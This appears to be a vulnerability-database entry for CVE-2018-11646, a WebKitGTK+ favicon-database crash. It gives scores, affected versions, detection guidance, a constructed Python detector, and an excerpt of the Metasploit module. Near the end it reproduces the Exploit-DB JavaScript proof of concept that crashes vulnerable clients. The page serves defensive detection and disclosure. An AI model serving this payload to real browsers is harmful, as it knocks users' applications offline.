CVE-2018-11646
Published 2018-06-01
CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in…
Priority P2 · 63 · high · CVSS 3.0: 7.5
Exploit: available
EPSS: 69.02% (99.3rd percentile)
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | webkit2gtk | < webkit2gtk 2.20.3-1 (bookworm) | webkit2gtk 2.20.3-1 (bookworm) |
| webkitgtk | webkitgtk | <= 2.21.3 | — |
Detection & IOCs (extracted from sources)
- The crash is triggered by opening a named window, navigating it to a second URL while the first load is still pending, stopping the load, and then writing into the stopped document; this causes webkitFaviconDatabaseSetIconForPageURL to be called with an unset pageURL. Monitor for window.open() calls followed by execCommand('stop') and document.write() in the same script context.
- The crash backtrace passes through webkitFaviconDatabaseSetIconURLForPageURL (WebKitFaviconDatabase.cpp line 193) and webkitFaviconDatabaseSetIconForPageURL (line 318). A SIGSEGV in a WebKitGTK+ process with these functions on the stack is a good indicator that this bug was hit, whether by the public PoC or organically; correlate with the script pattern above before calling it exploitation.
- The Metasploit auxiliary module (EDB-44876) serves the payload over HTTP; look for HTTP responses delivering JavaScript with the window.open / execCommand('stop') / document.write pattern to WebKitGTK+ user agents.
- Only WebKitGTK+ through 2.21.3 is affected, but Debian ships a backported fix in webkit2gtk 2.20.3-1, so an upstream version string below the cutoff is not by itself proof of exposure. Scope detections to unpatched deployments using the distribution's fixed version, not the upstream version alone.
- This is a DoS-only vulnerability (application crash) with no known code-execution primitive; scope detection efforts to availability impact rather than confidentiality or integrity.
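As an added example (not code from this page, the PoC authors, or any indexed detection rule), the following Python script turns the points above and the Debian fix-version status further down into checkable logic: it flags HTTP responses that deliver the window.open / execCommand('stop') / document.write sequence to a WebKitGTK+ client, matches a crash backtrace against the two favicon-database functions, and decides whether a package version is still exposed while honouring Debian's backported fix in 2.20.3-1. The User-Agent tokens, the sample responses and backtrace, and all function names are constructed assumptions, not data from the page.

```python
"""Constructed detection helpers for CVE-2018-11646 (added example; not from
the page, the PoC authors, or any indexed rule). Assumptions: HTTP responses
arrive as (url, user_agent, body) tuples, crash reports as raw backtrace
text, and package versions as 'X.Y.Z' or 'X.Y.Z-N' strings."""
import re
from typing import Iterable, List, Optional, Tuple

# The three calls the public PoC makes in one script context, in order:
# navigate a named window, stop the pending load, write into the document.
# DOTALL lets the match span several statements and lines.
SCRIPT_PATTERN = re.compile(
    r"window\.open\s*\(.*?execCommand\s*\(\s*['\"]stop['\"]\s*\).*?document\.write\s*\(",
    re.IGNORECASE | re.DOTALL,
)

# Assumption: User-Agent tokens that identify WebKitGTK+-based clients in
# your environment. Not every WebKitGTK+ embedder self-identifies; tune this.
WEBKITGTK_UA_TOKENS = ("WebKitGTK", "Epiphany", "Midori")

# Functions named in the crash backtrace for this bug.
CRASH_FRAMES = (
    "webkitFaviconDatabaseSetIconURLForPageURL",
    "webkitFaviconDatabaseSetIconForPageURL",
)

UPSTREAM_LAST_VULNERABLE = (2, 21, 3)   # "WebKitGTK+ through 2.21.3"
DEBIAN_FIXED = ((2, 20, 3), 1)          # webkit2gtk 2.20.3-1 carries the backport


def is_webkitgtk_ua(user_agent: str) -> bool:
    ua = user_agent.lower()
    return any(tok.lower() in ua for tok in WEBKITGTK_UA_TOKENS)


def script_matches_poc(body: str) -> bool:
    """True when a response body carries the open / stop / write sequence."""
    return SCRIPT_PATTERN.search(body) is not None


def flag_responses(responses: Iterable[Tuple[str, str, str]]) -> List[str]:
    """Return URLs of PoC-shaped JavaScript served to a WebKitGTK+ client."""
    return [url for url, ua, body in responses
            if is_webkitgtk_ua(ua) and script_matches_poc(body)]


def crash_matches_cve(backtrace: str) -> bool:
    """True when a backtrace passes through either favicon-database setter."""
    return any(frame in backtrace for frame in CRASH_FRAMES)


def parse_version(version: str) -> Tuple[Tuple[int, ...], int]:
    """'2.20.3-1' -> ((2, 20, 3), 1). A missing Debian revision counts as 0."""
    upstream, _, revision = version.partition("-")
    return tuple(int(p) for p in upstream.split(".")), int(revision or 0)


def is_vulnerable(version: str, distro: Optional[str] = None) -> bool:
    """Scope detections to unpatched builds. Debian backported the fix into
    2.20.3-1, so comparing only the upstream part would misclassify it."""
    upstream, rev = parse_version(version)
    if distro == "debian":
        return (upstream, rev) < DEBIAN_FIXED
    return upstream <= UPSTREAM_LAST_VULNERABLE


# Constructed samples, not real traffic or crash logs.
EPIPHANY_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/605.1.15 "
               "(KHTML, like Gecko) Epiphany/3.28")
SAMPLE_RESPONSES = [
    ("http://attacker.example/poc.html", EPIPHANY_UA,
     "win = window.open('slow.php', 'WIN');\n"
     "window.open('https://example.org', 'WIN');\n"
     "win.document.execCommand('Stop');\n"
     "win.document.write('x');\nwin.document.close();"),
    ("http://benign.example/app.js", EPIPHANY_UA,
     "document.write('<p>hello</p>');"),                   # no open/stop
    ("http://attacker.example/poc.html", "Mozilla/5.0 (Windows NT 10.0) Chrome/66.0",
     "window.open('a','W'); document.execCommand('stop'); document.write('x');"),
]
SAMPLE_BACKTRACE = (
    "#0 WTF::StringImpl::rawHash at StringImpl.h line 508\n"
    "#3 WTF::StringHash::hash at StringHash.h line 73\n"
    "#10 webkitFaviconDatabaseSetIconURLForPageURL at WebKitFaviconDatabase.cpp line 193\n"
)


def main() -> None:
    print("flagged responses:", flag_responses(SAMPLE_RESPONSES))
    print("backtrace matches CVE-2018-11646:", crash_matches_cve(SAMPLE_BACKTRACE))
    for ver, distro in (("2.21.3", None), ("2.21.4", None),
                        ("2.20.3-1", "debian"), ("2.18.6-1", "debian")):
        state = "vulnerable" if is_vulnerable(ver, distro) else "fixed"
        print(f"{ver} ({distro or 'upstream'}): {state}")


if __name__ == "__main__":
    main()
```

Run it directly to see the sample verdicts: only the first response is flagged, because the third carries the same script but goes to a non-WebKitGTK+ client. In practice, feed flag_responses() from proxy or IDS logs and crash_matches_cve() from the backtrace your core-dump handler produces; the version check is what keeps the alert volume scoped to hosts that can actually crash.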
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| osv | n/a | 7.5 | HIGH | n/a |
| vendor_debian | n/a | 7.5 | LOW | n/a |
Debian's LOW is the security tracker's own urgency rating, not a CVSS severity band, which is why it sits next to a 7.5 score.
GHSA
GHSA-q2c8-4vmf-78h5 · ghsa_unreviewed · 2022-05-13 · HIGH
Description identical to the NVD text above.
OSV
CVE-2018-11646 · osv · 2018-06-01 · CVSS 7.5 · HIGH
Description identical to the NVD text above.
Debian
webkit2gtk · vendor_debian · 2018 · CVSS 7.5 · HIGH
Description identical to the NVD text above.
Scope: local
bookworm: resolved (fixed in 2.20.3-1)
bullseye: resolved (fixed in 2.20.3-1)
forky: resolved (fixed in 2.20.3-1)
sid: resolved (fixed in 2.20.3-1)
trixie: resolved (fixed in 2.20.3-1)
No detection rules found.
Exploit-DB
WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)
exploitdb · 2018-06-11 · CVE-2018-11646
```ruby
# Excerpt of the Metasploit auxiliary module (EDB-44876). Only the module
# info hash is reproduced on this page; the class declaration, the HttpServer
# mixin and the on_request_uri handler that serves the JavaScript are not,
# and the surrounding initialize/update_info wrapper below is the standard
# Metasploit form that the trailing `))` of the excerpt closes.
def initialize(info = {})
  super(update_info(info,
    'Name'        => "WebKitGTK+ WebKitFaviconDatabase DoS",
    'Description' => %q(
      This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
      If successful, it could lead to application crash, resulting in denial of service.
    ),
    'License'     => MSF_LICENSE,
    'Author'      => [
      'Dhiraj Mishra',   # Original discovery, disclosure
      'Hardik Mehta',    # Original discovery, disclosure
      'Zubin Devnani',   # Original discovery, disclosure
      'Manuel Caballero' # JS Code
    ],
    'References'  => [
      ['EDB', '44842'],
      ['CVE', '2018-11646'],
      ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
      ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
    ],
    'DisclosureDate' => 'Jun 03 2018',
    'Actions'        => [[ 'WebServer' ]],
    'PassiveActions' => [ 'WebServer' ],
    'DefaultAction'  => 'WebServer'
  ))
end
```
Exploit-DB
WebKitGTK+ < 2.21.3 - Crash (PoC)
exploitdb · 2018-06-05 · CVSS 7.5 · HIGH · CVE-2018-11646
```javascript
// Open a named window on a slow-loading page (sleep_one_second.php is the
// PoC's server-side delay), then navigate the same named window elsewhere
// so that a second load is pending.
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
// Stop the pending load and write into the document. The favicon database
// is then updated for a page whose pageURL was never set, and WebKitGTK+
// through 2.21.3 crashes.
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win.document.close();
```
Backtrace on Fedora 27 (webkitgtk4-2.18.0-2.fc27.x86_64); frames #4 to #8 and the end of the trace are not reproduced on the page, and the template arguments of the HashMap frame were lost in extraction:
```text
#0 WTF::StringImpl::rawHash
   at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
   at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
   at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
   at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
   at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WT
```
Metasploit
WebKitGTK+ WebKitFaviconDatabase DoS
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to application crash, resulting in denial of service.
No writeups or analysis indexed.
References
- https://bugs.webkit.org/show_bug.cgi?id=186164
- https://bugzilla.gnome.org/show_bug.cgi?id=795740
- https://security.gentoo.org/glsa/201808-04
- https://www.exploit-db.com/exploits/44842/
- https://www.exploit-db.com/exploits/44876/